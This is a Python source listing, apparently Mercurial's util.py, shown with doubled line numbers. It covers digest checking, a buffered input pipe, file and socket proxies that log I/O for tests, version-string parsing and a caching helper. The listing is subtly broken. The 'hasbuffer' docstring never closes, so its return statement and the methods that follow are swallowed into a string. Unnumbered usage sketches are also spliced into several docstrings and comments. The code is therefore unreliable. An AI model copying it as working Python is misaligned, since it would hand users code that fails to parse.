125 125 umask = platform.umask
126 126 unlink = platform.unlink
127 127 username = platform.username
128 128
129 129 try:
130 130 recvfds = osutil.recvfds
131 131 except AttributeError:
132 132 pass
133 133
134 134 # Python compatibility
135 135
136 136 _notset = object()
137 137
138 138 def bitsfrom(container):
139 139 bits = 0
140 140 for bit in container:
141 141 bits |= bit
142 142 return bits
143 143
144 144 # Python 2.6 still has deprecation warnings enabled by default. We do not
145 145 # want to display anything to standard users, so detect if we are running
146 146 # tests and only use Python deprecation warnings in that case.
147 147 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
148 148 if _dowarn:
149 149 # explicitly unfilter our warning for python 2.7
150 150 #
151 151 # The option of setting PYTHONWARNINGS in the test runner was investigated.
152 152 # However, the module name set through PYTHONWARNINGS is matched exactly,
153 153 # so we cannot set 'mercurial' and have it match e.g. 'mercurial.scmutil'.
154 154 # This makes the whole PYTHONWARNINGS approach useless for our use case.
155 155 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
156 156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
157 157 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
158 158 if _dowarn and pycompat.ispy3:
159 159 # silence warning emitted by passing user string to re.sub()
160 160 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
161 161 r'mercurial')
162 162 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
163 163 DeprecationWarning, r'mercurial')
164 164 # TODO: reinvent imp.is_frozen()
165 165 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
166 166 DeprecationWarning, r'mercurial')
167 167
168 168 def nouideprecwarn(msg, version, stacklevel=1):
169 169 """Issue a Python-native deprecation warning
170 170
171 171 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
172 172 """
173 173 if _dowarn:
174 174 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
175 175 " update your code.)") % version
176 176 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
177 177
178 178 DIGESTS = {
179 179 'md5': hashlib.md5,
180 180 'sha1': hashlib.sha1,
181 181 'sha512': hashlib.sha512,
182 182 }
183 183 # List of digest types from strongest to weakest
184 184 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
185 185
186 186 for k in DIGESTS_BY_STRENGTH:
187 187 assert k in DIGESTS
188 188
189 189 class digester(object):
190 190 """helper to compute digests.
191 191
192 192 This helper can be used to compute one or more digests given their name.
193 193
194 194 >>> d = digester([b'md5', b'sha1'])
195 195 >>> d.update(b'foo')
196 196 >>> [k for k in sorted(d)]
197 197 ['md5', 'sha1']
198 198 >>> d[b'md5']
199 199 'acbd18db4cc2f85cedef654fccc4a4d8'
200 200 >>> d[b'sha1']
201 201 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
202 202 >>> digester.preferred([b'md5', b'sha1'])
203 203 'sha1'
204 204 """
205 205
206 206 def __init__(self, digests, s=''):
207 207 self._hashes = {}
208 208 for k in digests:
209 209 if k not in DIGESTS:
210 210 raise error.Abort(_('unknown digest type: %s') % k)
211 211 self._hashes[k] = DIGESTS[k]()
212 212 if s:
213 213 self.update(s)
214 214
215 215 def update(self, data):
216 216 for h in self._hashes.values():
217 217 h.update(data)
218 218
219 219 def __getitem__(self, key):
220 220 if key not in DIGESTS:
221 221 raise error.Abort(_('unknown digest type: %s') % key)
222 222 return nodemod.hex(self._hashes[key].digest())
223 223
224 224 def __iter__(self):
225 225 return iter(self._hashes)
226 226
227 227 @staticmethod
228 228 def preferred(supported):
229 229 """returns the strongest digest type in both supported and DIGESTS."""
230 230
231 231 for k in DIGESTS_BY_STRENGTH:
232 232 if k in supported:
233 233 return k
234 234 return None
235 235
236 236 class digestchecker(object):
237 237 """file handle wrapper that additionally checks content against a given
238 238 size and digests.
239 239
240 240 d = digestchecker(fh, size, {'md5': '...'})
241 241
242 242 When multiple digests are given, all of them are validated.
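
A sketch of the typical flow (the chunk size is arbitrary)::

  while d.read(4096):
      pass
  d.validate()   # raises error.Abort on size or digest mismatch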
243 243 """
244 244
245 245 def __init__(self, fh, size, digests):
246 246 self._fh = fh
247 247 self._size = size
248 248 self._got = 0
249 249 self._digests = dict(digests)
250 250 self._digester = digester(self._digests.keys())
251 251
252 252 def read(self, length=-1):
253 253 content = self._fh.read(length)
254 254 self._digester.update(content)
255 255 self._got += len(content)
256 256 return content
257 257
258 258 def validate(self):
259 259 if self._size != self._got:
260 260 raise error.Abort(_('size mismatch: expected %d, got %d') %
261 261 (self._size, self._got))
262 262 for k, v in self._digests.items():
263 263 if v != self._digester[k]:
264 264 # i18n: first parameter is a digest name
265 265 raise error.Abort(_('%s mismatch: expected %s, got %s') %
266 266 (k, v, self._digester[k]))
267 267
268 268 try:
269 269 buffer = buffer
270 270 except NameError:
271 271 def buffer(sliceable, offset=0, length=None):
272 272 if length is not None:
273 273 return memoryview(sliceable)[offset:offset + length]
274 274 return memoryview(sliceable)[offset:]
275 275
276 276 _chunksize = 4096
277 277
278 278 class bufferedinputpipe(object):
279 279 """a manually buffered input pipe
280 280
281 281 Python will not let us use buffered IO and lazy reading with 'polling' at
282 282 the same time. We cannot probe the buffer state and select will not detect
283 283 that data are ready to read if they are already buffered.
284 284
285 285 This class lets us work around that by implementing its own buffering
286 286 (allowing efficient readline) while offering a way to know if the buffer is
287 287 empty from the output (allowing collaboration of the buffer with polling).
288 288
289 289 This class lives in the 'util' module because it makes use of the 'os'
290 290 module from the python stdlib.
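
A rough usage sketch ('fh' stands for an assumed file object wrapping the
read end of a pipe)::

  p = bufferedinputpipe(fh)
  if not p.hasbuffer:
      pass   # nothing buffered yet; safe to poll p.fileno()
  line = p.readline()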
291 291 """
292 292 def __new__(cls, fh):
293 293 # If we receive a fileobjectproxy, we need to use a variation of this
294 294 # class that notifies observers about activity.
295 295 if isinstance(fh, fileobjectproxy):
296 296 cls = observedbufferedinputpipe
297 297
298 298 return super(bufferedinputpipe, cls).__new__(cls)
299 299
300 300 def __init__(self, input):
301 301 self._input = input
302 302 self._buffer = []
303 303 self._eof = False
304 304 self._lenbuf = 0
305 305
306 306 @property
307 307 def hasbuffer(self):
308 308 """True if any data is currently buffered
309 309
310 310 This will be used externally as a pre-step for polling IO. If there is
311 311 already buffered data then no polling should be set in place.
312 312 return bool(self._buffer)
313 313
314 314 @property
315 315 def closed(self):
316 316 return self._input.closed
317 317
318 318 def fileno(self):
319 319 return self._input.fileno()
320 320
321 321 def close(self):
322 322 return self._input.close()
323 323
324 324 def read(self, size):
325 325 while (not self._eof) and (self._lenbuf < size):
326 326 self._fillbuffer()
327 327 return self._frombuffer(size)
328 328
329 329 def unbufferedread(self, size):
330 330 if not self._eof and self._lenbuf == 0:
331 331 self._fillbuffer(max(size, _chunksize))
332 332 return self._frombuffer(min(self._lenbuf, size))
333 333
334 334 def readline(self, *args, **kwargs):
335 335 if 1 < len(self._buffer):
336 336 # this should not happen because both read and readline end with a
337 337 # _frombuffer call that collapses it.
338 338 self._buffer = [''.join(self._buffer)]
339 339 self._lenbuf = len(self._buffer[0])
340 340 lfi = -1
341 341 if self._buffer:
342 342 lfi = self._buffer[-1].find('\n')
343 343 while (not self._eof) and lfi < 0:
344 344 self._fillbuffer()
345 345 if self._buffer:
346 346 lfi = self._buffer[-1].find('\n')
347 347 size = lfi + 1
348 348 if lfi < 0: # end of file
349 349 size = self._lenbuf
350 350 elif 1 < len(self._buffer):
351 351 # we need to take previous chunks into account
352 352 size += self._lenbuf - len(self._buffer[-1])
353 353 return self._frombuffer(size)
354 354
355 355 def _frombuffer(self, size):
356 356 """return at most 'size' data from the buffer
357 357
358 358 The data are removed from the buffer."""
359 359 if size == 0 or not self._buffer:
360 360 return ''
361 361 buf = self._buffer[0]
362 362 if 1 < len(self._buffer):
363 363 buf = ''.join(self._buffer)
364 364
365 365 data = buf[:size]
366 366 buf = buf[len(data):]
367 367 if buf:
368 368 self._buffer = [buf]
369 369 self._lenbuf = len(buf)
370 370 else:
371 371 self._buffer = []
372 372 self._lenbuf = 0
373 373 return data
374 374
375 375 def _fillbuffer(self, size=_chunksize):
376 376 """read data to the buffer"""
377 377 data = os.read(self._input.fileno(), size)
378 378 if not data:
379 379 self._eof = True
380 380 else:
381 381 self._lenbuf += len(data)
382 382 self._buffer.append(data)
383 383
384 384 return data
385 385
386 386 def mmapread(fp):
387 387 try:
388 388 fd = getattr(fp, 'fileno', lambda: fp)()
389 389 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
390 390 except ValueError:
391 391 # Empty files cannot be mmapped, but mmapread should still work. Check
392 392 # if the file is empty, and if so, return an empty buffer.
393 393 if os.fstat(fd).st_size == 0:
394 394 return ''
395 395 raise
396 396
397 397 class fileobjectproxy(object):
398 398 """A proxy around file objects that tells a watcher when events occur.
399 399
400 400 This type is intended to only be used for testing purposes. Think hard
401 401 before using it in important code.
402 402 """
403 403 __slots__ = (
404 404 r'_orig',
405 405 r'_observer',
406 406 )
407 407
408 408 def __init__(self, fh, observer):
409 409 object.__setattr__(self, r'_orig', fh)
410 410 object.__setattr__(self, r'_observer', observer)
411 411
412 412 def __getattribute__(self, name):
413 413 ours = {
414 414 r'_observer',
415 415
416 416 # IOBase
417 417 r'close',
418 418 # closed if a property
419 419 r'fileno',
420 420 r'flush',
421 421 r'isatty',
422 422 r'readable',
423 423 r'readline',
424 424 r'readlines',
425 425 r'seek',
426 426 r'seekable',
427 427 r'tell',
428 428 r'truncate',
429 429 r'writable',
430 430 r'writelines',
431 431 # RawIOBase
432 432 r'read',
433 433 r'readall',
434 434 r'readinto',
435 435 r'write',
436 436 # BufferedIOBase
437 437 # raw is a property
438 438 r'detach',
439 439 # read defined above
440 440 r'read1',
441 441 # readinto defined above
442 442 # write defined above
443 443 }
444 444
445 445 # We only observe some methods.
446 446 if name in ours:
447 447 return object.__getattribute__(self, name)
448 448
449 449 return getattr(object.__getattribute__(self, r'_orig'), name)
450 450
451 451 def __nonzero__(self):
452 452 return bool(object.__getattribute__(self, r'_orig'))
453 453
454 454 __bool__ = __nonzero__
455 455
456 456 def __delattr__(self, name):
457 457 return delattr(object.__getattribute__(self, r'_orig'), name)
458 458
459 459 def __setattr__(self, name, value):
460 460 return setattr(object.__getattribute__(self, r'_orig'), name, value)
461 461
462 462 def __iter__(self):
463 463 return object.__getattribute__(self, r'_orig').__iter__()
464 464
465 465 def _observedcall(self, name, *args, **kwargs):
466 466 # Call the original object.
467 467 orig = object.__getattribute__(self, r'_orig')
468 468 res = getattr(orig, name)(*args, **kwargs)
469 469
470 470 # Call a method on the observer of the same name with arguments
471 471 # so it can react, log, etc.
472 472 observer = object.__getattribute__(self, r'_observer')
473 473 fn = getattr(observer, name, None)
474 474 if fn:
475 475 fn(res, *args, **kwargs)
476 476
477 477 return res
478 478
479 479 def close(self, *args, **kwargs):
480 480 return object.__getattribute__(self, r'_observedcall')(
481 481 r'close', *args, **kwargs)
482 482
483 483 def fileno(self, *args, **kwargs):
484 484 return object.__getattribute__(self, r'_observedcall')(
485 485 r'fileno', *args, **kwargs)
486 486
487 487 def flush(self, *args, **kwargs):
488 488 return object.__getattribute__(self, r'_observedcall')(
489 489 r'flush', *args, **kwargs)
490 490
491 491 def isatty(self, *args, **kwargs):
492 492 return object.__getattribute__(self, r'_observedcall')(
493 493 r'isatty', *args, **kwargs)
494 494
495 495 def readable(self, *args, **kwargs):
496 496 return object.__getattribute__(self, r'_observedcall')(
497 497 r'readable', *args, **kwargs)
498 498
499 499 def readline(self, *args, **kwargs):
500 500 return object.__getattribute__(self, r'_observedcall')(
501 501 r'readline', *args, **kwargs)
502 502
503 503 def readlines(self, *args, **kwargs):
504 504 return object.__getattribute__(self, r'_observedcall')(
505 505 r'readlines', *args, **kwargs)
506 506
507 507 def seek(self, *args, **kwargs):
508 508 return object.__getattribute__(self, r'_observedcall')(
509 509 r'seek', *args, **kwargs)
510 510
511 511 def seekable(self, *args, **kwargs):
512 512 return object.__getattribute__(self, r'_observedcall')(
513 513 r'seekable', *args, **kwargs)
514 514
515 515 def tell(self, *args, **kwargs):
516 516 return object.__getattribute__(self, r'_observedcall')(
517 517 r'tell', *args, **kwargs)
518 518
519 519 def truncate(self, *args, **kwargs):
520 520 return object.__getattribute__(self, r'_observedcall')(
521 521 r'truncate', *args, **kwargs)
522 522
523 523 def writable(self, *args, **kwargs):
524 524 return object.__getattribute__(self, r'_observedcall')(
525 525 r'writable', *args, **kwargs)
526 526
527 527 def writelines(self, *args, **kwargs):
528 528 return object.__getattribute__(self, r'_observedcall')(
529 529 r'writelines', *args, **kwargs)
530 530
531 531 def read(self, *args, **kwargs):
532 532 return object.__getattribute__(self, r'_observedcall')(
533 533 r'read', *args, **kwargs)
534 534
535 535 def readall(self, *args, **kwargs):
536 536 return object.__getattribute__(self, r'_observedcall')(
537 537 r'readall', *args, **kwargs)
538 538
539 539 def readinto(self, *args, **kwargs):
540 540 return object.__getattribute__(self, r'_observedcall')(
541 541 r'readinto', *args, **kwargs)
542 542
543 543 def write(self, *args, **kwargs):
544 544 return object.__getattribute__(self, r'_observedcall')(
545 545 r'write', *args, **kwargs)
546 546
547 547 def detach(self, *args, **kwargs):
548 548 return object.__getattribute__(self, r'_observedcall')(
549 549 r'detach', *args, **kwargs)
550 550
551 551 def read1(self, *args, **kwargs):
552 552 return object.__getattribute__(self, r'_observedcall')(
553 553 r'read1', *args, **kwargs)
554 554
555 555 class observedbufferedinputpipe(bufferedinputpipe):
556 556 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
557 557
558 558 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
559 559 bypass ``fileobjectproxy``. Because of this, we need to make
560 560 ``bufferedinputpipe`` aware of these operations.
561 561
562 562 This variation of ``bufferedinputpipe`` can notify observers about
563 563 ``os.read()`` events. It also re-publishes other events, such as
564 564 ``read()`` and ``readline()``.
565 565 """
566 566 def _fillbuffer(self):
567 567 res = super(observedbufferedinputpipe, self)._fillbuffer()
568 568
569 569 fn = getattr(self._input._observer, r'osread', None)
570 570 if fn:
571 571 fn(res, _chunksize)
572 572
573 573 return res
574 574
575 575 # We use different observer methods because the operation isn't
576 576 # performed on the actual file object but on us.
577 577 def read(self, size):
578 578 res = super(observedbufferedinputpipe, self).read(size)
579 579
580 580 fn = getattr(self._input._observer, r'bufferedread', None)
581 581 if fn:
582 582 fn(res, size)
583 583
584 584 return res
585 585
586 586 def readline(self, *args, **kwargs):
587 587 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
588 588
589 589 fn = getattr(self._input._observer, r'bufferedreadline', None)
590 590 if fn:
591 591 fn(res)
592 592
593 593 return res
594 594
595 595 PROXIED_SOCKET_METHODS = {
596 596 r'makefile',
597 597 r'recv',
598 598 r'recvfrom',
599 599 r'recvfrom_into',
600 600 r'recv_into',
601 601 r'send',
602 602 r'sendall',
603 603 r'sendto',
604 604 r'setblocking',
605 605 r'settimeout',
606 606 r'gettimeout',
607 607 r'setsockopt',
608 608 }
609 609
610 610 class socketproxy(object):
611 611 """A proxy around a socket that tells a watcher when events occur.
612 612
613 613 This is like ``fileobjectproxy`` except for sockets.
614 614
615 615 This type is intended to only be used for testing purposes. Think hard
616 616 before using it in important code.
617 617 """
618 618 __slots__ = (
619 619 r'_orig',
620 620 r'_observer',
621 621 )
622 622
623 623 def __init__(self, sock, observer):
624 624 object.__setattr__(self, r'_orig', sock)
625 625 object.__setattr__(self, r'_observer', observer)
626 626
627 627 def __getattribute__(self, name):
628 628 if name in PROXIED_SOCKET_METHODS:
629 629 return object.__getattribute__(self, name)
630 630
631 631 return getattr(object.__getattribute__(self, r'_orig'), name)
632 632
633 633 def __delattr__(self, name):
634 634 return delattr(object.__getattribute__(self, r'_orig'), name)
635 635
636 636 def __setattr__(self, name, value):
637 637 return setattr(object.__getattribute__(self, r'_orig'), name, value)
638 638
639 639 def __nonzero__(self):
640 640 return bool(object.__getattribute__(self, r'_orig'))
641 641
642 642 __bool__ = __nonzero__
643 643
644 644 def _observedcall(self, name, *args, **kwargs):
645 645 # Call the original object.
646 646 orig = object.__getattribute__(self, r'_orig')
647 647 res = getattr(orig, name)(*args, **kwargs)
648 648
649 649 # Call a method on the observer of the same name with arguments
650 650 # so it can react, log, etc.
651 651 observer = object.__getattribute__(self, r'_observer')
652 652 fn = getattr(observer, name, None)
653 653 if fn:
654 654 fn(res, *args, **kwargs)
655 655
656 656 return res
657 657
658 658 def makefile(self, *args, **kwargs):
659 659 res = object.__getattribute__(self, r'_observedcall')(
660 660 r'makefile', *args, **kwargs)
661 661
662 662 # The file object may be used for I/O. So we turn it into a
663 663 # proxy using our observer.
664 664 observer = object.__getattribute__(self, r'_observer')
665 665 return makeloggingfileobject(observer.fh, res, observer.name,
666 666 reads=observer.reads,
667 667 writes=observer.writes,
668 668 logdata=observer.logdata,
669 669 logdataapis=observer.logdataapis)
670 670
671 671 def recv(self, *args, **kwargs):
672 672 return object.__getattribute__(self, r'_observedcall')(
673 673 r'recv', *args, **kwargs)
674 674
675 675 def recvfrom(self, *args, **kwargs):
676 676 return object.__getattribute__(self, r'_observedcall')(
677 677 r'recvfrom', *args, **kwargs)
678 678
679 679 def recvfrom_into(self, *args, **kwargs):
680 680 return object.__getattribute__(self, r'_observedcall')(
681 681 r'recvfrom_into', *args, **kwargs)
682 682
683 683 def recv_into(self, *args, **kwargs):
684 684 return object.__getattribute__(self, r'_observedcall')(
685 685 r'recv_into', *args, **kwargs)
686 686
687 687 def send(self, *args, **kwargs):
688 688 return object.__getattribute__(self, r'_observedcall')(
689 689 r'send', *args, **kwargs)
690 690
691 691 def sendall(self, *args, **kwargs):
692 692 return object.__getattribute__(self, r'_observedcall')(
693 693 r'sendall', *args, **kwargs)
694 694
695 695 def sendto(self, *args, **kwargs):
696 696 return object.__getattribute__(self, r'_observedcall')(
697 697 r'sendto', *args, **kwargs)
698 698
699 699 def setblocking(self, *args, **kwargs):
700 700 return object.__getattribute__(self, r'_observedcall')(
701 701 r'setblocking', *args, **kwargs)
702 702
703 703 def settimeout(self, *args, **kwargs):
704 704 return object.__getattribute__(self, r'_observedcall')(
705 705 r'settimeout', *args, **kwargs)
706 706
707 707 def gettimeout(self, *args, **kwargs):
708 708 return object.__getattribute__(self, r'_observedcall')(
709 709 r'gettimeout', *args, **kwargs)
710 710
711 711 def setsockopt(self, *args, **kwargs):
712 712 return object.__getattribute__(self, r'_observedcall')(
713 713 r'setsockopt', *args, **kwargs)
714 714
715 715 class baseproxyobserver(object):
716 716 def _writedata(self, data):
717 717 if not self.logdata:
718 718 if self.logdataapis:
719 719 self.fh.write('\n')
720 720 self.fh.flush()
721 721 return
722 722
723 723 # Simple case writes all data on a single line.
724 724 if b'\n' not in data:
725 725 if self.logdataapis:
726 726 self.fh.write(': %s\n' % stringutil.escapestr(data))
727 727 else:
728 728 self.fh.write('%s> %s\n'
729 729 % (self.name, stringutil.escapestr(data)))
730 730 self.fh.flush()
731 731 return
732 732
733 733 # Data with newlines is written to multiple lines.
734 734 if self.logdataapis:
735 735 self.fh.write(':\n')
736 736
737 737 lines = data.splitlines(True)
738 738 for line in lines:
739 739 self.fh.write('%s> %s\n'
740 740 % (self.name, stringutil.escapestr(line)))
741 741 self.fh.flush()
742 742
743 743 class fileobjectobserver(baseproxyobserver):
744 744 """Logs file object activity."""
745 745 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
746 746 logdataapis=True):
747 747 self.fh = fh
748 748 self.name = name
749 749 self.logdata = logdata
750 750 self.logdataapis = logdataapis
751 751 self.reads = reads
752 752 self.writes = writes
753 753
754 754 def read(self, res, size=-1):
755 755 if not self.reads:
756 756 return
757 757 # Python 3 can return None from reads at EOF instead of empty strings.
758 758 if res is None:
759 759 res = ''
760 760
761 761 if size == -1 and res == '':
762 762 # Suppress pointless read(-1) calls that return
763 763 # nothing. These happen _a lot_ on Python 3, and there
764 764 # doesn't seem to be a better workaround to have matching
765 765 # Python 2 and 3 behavior. :(
766 766 return
767 767
768 768 if self.logdataapis:
769 769 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
770 770
771 771 self._writedata(res)
772 772
773 773 def readline(self, res, limit=-1):
774 774 if not self.reads:
775 775 return
776 776
777 777 if self.logdataapis:
778 778 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
779 779
780 780 self._writedata(res)
781 781
782 782 def readinto(self, res, dest):
783 783 if not self.reads:
784 784 return
785 785
786 786 if self.logdataapis:
787 787 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
788 788 res))
789 789
790 790 data = dest[0:res] if res is not None else b''
791 791 self._writedata(data)
792 792
793 793 def write(self, res, data):
794 794 if not self.writes:
795 795 return
796 796
797 797 # Python 2 returns None from some write() calls. Python 3 (reasonably)
798 798 # returns the number of bytes written.
799 799 if res is None and data:
800 800 res = len(data)
801 801
802 802 if self.logdataapis:
803 803 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
804 804
805 805 self._writedata(data)
806 806
807 807 def flush(self, res):
808 808 if not self.writes:
809 809 return
810 810
811 811 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
812 812
813 813 # For observedbufferedinputpipe.
814 814 def bufferedread(self, res, size):
815 815 if not self.reads:
816 816 return
817 817
818 818 if self.logdataapis:
819 819 self.fh.write('%s> bufferedread(%d) -> %d' % (
820 820 self.name, size, len(res)))
821 821
822 822 self._writedata(res)
823 823
824 824 def bufferedreadline(self, res):
825 825 if not self.reads:
826 826 return
827 827
828 828 if self.logdataapis:
829 829 self.fh.write('%s> bufferedreadline() -> %d' % (
830 830 self.name, len(res)))
831 831
832 832 self._writedata(res)
833 833
834 834 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
835 835 logdata=False, logdataapis=True):
836 836 """Turn a file object into a logging file object."""
837 837
838 838 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
839 839 logdata=logdata, logdataapis=logdataapis)
840 840 return fileobjectproxy(fh, observer)
841 841
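# An illustrative use of makeloggingfileobject(); 'logfh' is an assumed
# file object receiving the log output:
#
#   proxy = makeloggingfileobject(logfh, fh, b'conn', logdata=True)
#   proxy.write(b'ping')   # logs something like: conn> write(4) -> 4: ping
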
842 842 class socketobserver(baseproxyobserver):
843 843 """Logs socket activity."""
844 844 def __init__(self, fh, name, reads=True, writes=True, states=True,
845 845 logdata=False, logdataapis=True):
846 846 self.fh = fh
847 847 self.name = name
848 848 self.reads = reads
849 849 self.writes = writes
850 850 self.states = states
851 851 self.logdata = logdata
852 852 self.logdataapis = logdataapis
853 853
854 854 def makefile(self, res, mode=None, bufsize=None):
855 855 if not self.states:
856 856 return
857 857
858 858 self.fh.write('%s> makefile(%r, %r)\n' % (
859 859 self.name, mode, bufsize))
860 860
861 861 def recv(self, res, size, flags=0):
862 862 if not self.reads:
863 863 return
864 864
865 865 if self.logdataapis:
866 866 self.fh.write('%s> recv(%d, %d) -> %d' % (
867 867 self.name, size, flags, len(res)))
868 868 self._writedata(res)
869 869
870 870 def recvfrom(self, res, size, flags=0):
871 871 if not self.reads:
872 872 return
873 873
874 874 if self.logdataapis:
875 875 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
876 876 self.name, size, flags, len(res[0])))
877 877
878 878 self._writedata(res[0])
879 879
880 880 def recvfrom_into(self, res, buf, size, flags=0):
881 881 if not self.reads:
882 882 return
883 883
884 884 if self.logdataapis:
885 885 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
886 886 self.name, size, flags, res[0]))
887 887
888 888 self._writedata(buf[0:res[0]])
889 889
890 890 def recv_into(self, res, buf, size=0, flags=0):
891 891 if not self.reads:
892 892 return
893 893
894 894 if self.logdataapis:
895 895 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
896 896 self.name, size, flags, res))
897 897
898 898 self._writedata(buf[0:res])
899 899
900 900 def send(self, res, data, flags=0):
901 901 if not self.writes:
902 902 return
903 903
904 904 self.fh.write('%s> send(%d, %d) -> %d' % (
905 905 self.name, len(data), flags, len(res)))
906 906 self._writedata(data)
907 907
908 908 def sendall(self, res, data, flags=0):
909 909 if not self.writes:
910 910 return
911 911
912 912 if self.logdataapis:
913 913 # Returns None on success. So don't bother reporting return value.
914 914 self.fh.write('%s> sendall(%d, %d)' % (
915 915 self.name, len(data), flags))
916 916
917 917 self._writedata(data)
918 918
919 919 def sendto(self, res, data, flagsoraddress, address=None):
920 920 if not self.writes:
921 921 return
922 922
923 923 if address:
924 924 flags = flagsoraddress
925 925 else:
926 926 flags = 0
927 927
928 928 if self.logdataapis:
929 929 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
930 930 self.name, len(data), flags, address, res))
931 931
932 932 self._writedata(data)
933 933
934 934 def setblocking(self, res, flag):
935 935 if not self.states:
936 936 return
937 937
938 938 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
939 939
940 940 def settimeout(self, res, value):
941 941 if not self.states:
942 942 return
943 943
944 944 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
945 945
946 946 def gettimeout(self, res):
947 947 if not self.states:
948 948 return
949 949
950 950 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
951 951
952 952 def setsockopt(self, res, level, optname, value):
953 953 if not self.states:
954 954 return
955 955
956 956 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
957 957 self.name, level, optname, value, res))
958 958
959 959 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
960 960 logdata=False, logdataapis=True):
961 961 """Turn a socket into a logging socket."""
962 962
963 963 observer = socketobserver(logh, name, reads=reads, writes=writes,
964 964 states=states, logdata=logdata,
965 965 logdataapis=logdataapis)
966 966 return socketproxy(fh, observer)
967 967
968 968 def version():
969 969 """Return version information if available."""
970 970 try:
971 971 from . import __version__
972 972 return __version__.version
973 973 except ImportError:
974 974 return 'unknown'
975 975
976 976 def versiontuple(v=None, n=4):
977 977 """Parses a Mercurial version string into an N-tuple.
978 978
979 979 The version string to be parsed is specified with the ``v`` argument.
980 980 If it isn't defined, the current Mercurial version string will be parsed.
981 981
982 982 ``n`` can be 2, 3, or 4. Here is how some version strings map to
983 983 returned values:
984 984
985 985 >>> v = b'3.6.1+190-df9b73d2d444'
986 986 >>> versiontuple(v, 2)
987 987 (3, 6)
988 988 >>> versiontuple(v, 3)
989 989 (3, 6, 1)
990 990 >>> versiontuple(v, 4)
991 991 (3, 6, 1, '190-df9b73d2d444')
992 992
993 993 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
994 994 (3, 6, 1, '190-df9b73d2d444+20151118')
995 995
996 996 >>> v = b'3.6'
997 997 >>> versiontuple(v, 2)
998 998 (3, 6)
999 999 >>> versiontuple(v, 3)
1000 1000 (3, 6, None)
1001 1001 >>> versiontuple(v, 4)
1002 1002 (3, 6, None, None)
1003 1003
1004 1004 >>> v = b'3.9-rc'
1005 1005 >>> versiontuple(v, 2)
1006 1006 (3, 9)
1007 1007 >>> versiontuple(v, 3)
1008 1008 (3, 9, None)
1009 1009 >>> versiontuple(v, 4)
1010 1010 (3, 9, None, 'rc')
1011 1011
1012 1012 >>> v = b'3.9-rc+2-02a8fea4289b'
1013 1013 >>> versiontuple(v, 2)
1014 1014 (3, 9)
1015 1015 >>> versiontuple(v, 3)
1016 1016 (3, 9, None)
1017 1017 >>> versiontuple(v, 4)
1018 1018 (3, 9, None, 'rc+2-02a8fea4289b')
1019 1019
1020 1020 >>> versiontuple(b'4.6rc0')
1021 1021 (4, 6, None, 'rc0')
1022 1022 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1023 1023 (4, 6, None, 'rc0+12-425d55e54f98')
1024 1024 >>> versiontuple(b'.1.2.3')
1025 1025 (None, None, None, '.1.2.3')
1026 1026 >>> versiontuple(b'12.34..5')
1027 1027 (12, 34, None, '..5')
1028 1028 >>> versiontuple(b'1.2.3.4.5.6')
1029 1029 (1, 2, 3, '.4.5.6')
1030 1030 """
1031 1031 if not v:
1032 1032 v = version()
1033 1033 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1034 1034 if not m:
1035 1035 vparts, extra = '', v
1036 1036 elif m.group(2):
1037 1037 vparts, extra = m.groups()
1038 1038 else:
1039 1039 vparts, extra = m.group(1), None
1040 1040
1041 1041 vints = []
1042 1042 for i in vparts.split('.'):
1043 1043 try:
1044 1044 vints.append(int(i))
1045 1045 except ValueError:
1046 1046 break
1047 1047 # (3, 6) -> (3, 6, None)
1048 1048 while len(vints) < 3:
1049 1049 vints.append(None)
1050 1050
1051 1051 if n == 2:
1052 1052 return (vints[0], vints[1])
1053 1053 if n == 3:
1054 1054 return (vints[0], vints[1], vints[2])
1055 1055 if n == 4:
1056 1056 return (vints[0], vints[1], vints[2], extra)
1057 1057
1058 1058 def cachefunc(func):
1059 1059 '''cache the result of function calls'''
1060 1060 # XXX doesn't handle keyword args
1061 1061 if func.__code__.co_argcount == 0:
1062 1062 cache = []
1063 1063 def f():
1064 1064 if len(cache) == 0:
1065 1065 cache.append(func())
1066 1066 return cache[0]
1067 1067 return f
1068 1068 cache = {}
1069 1069 if func.__code__.co_argcount == 1:
1070 1070 # we gain a small amount of time because
1071 1071 # we don't need to pack/unpack the list
1072 1072 def f(arg):
1073 1073 if arg not in cache:
1074 1074 cache[arg] = func(arg)
1075 1075 return cache[arg]
1076 1076 else:
1077 1077 def f(*args):
1078 1078 if args not in cache:
1079 1079 cache[args] = func(*args)
1080 1080 return cache[args]
1081 1081
1082 1082 return f
1083 1083
1084 1084 class cow(object):
1085 1085 """helper class to make copy-on-write easier
1086 1086
1087 1087 Call preparewrite before doing any writes.
1088 1088 """
1089 1089
1090 1090 def preparewrite(self):
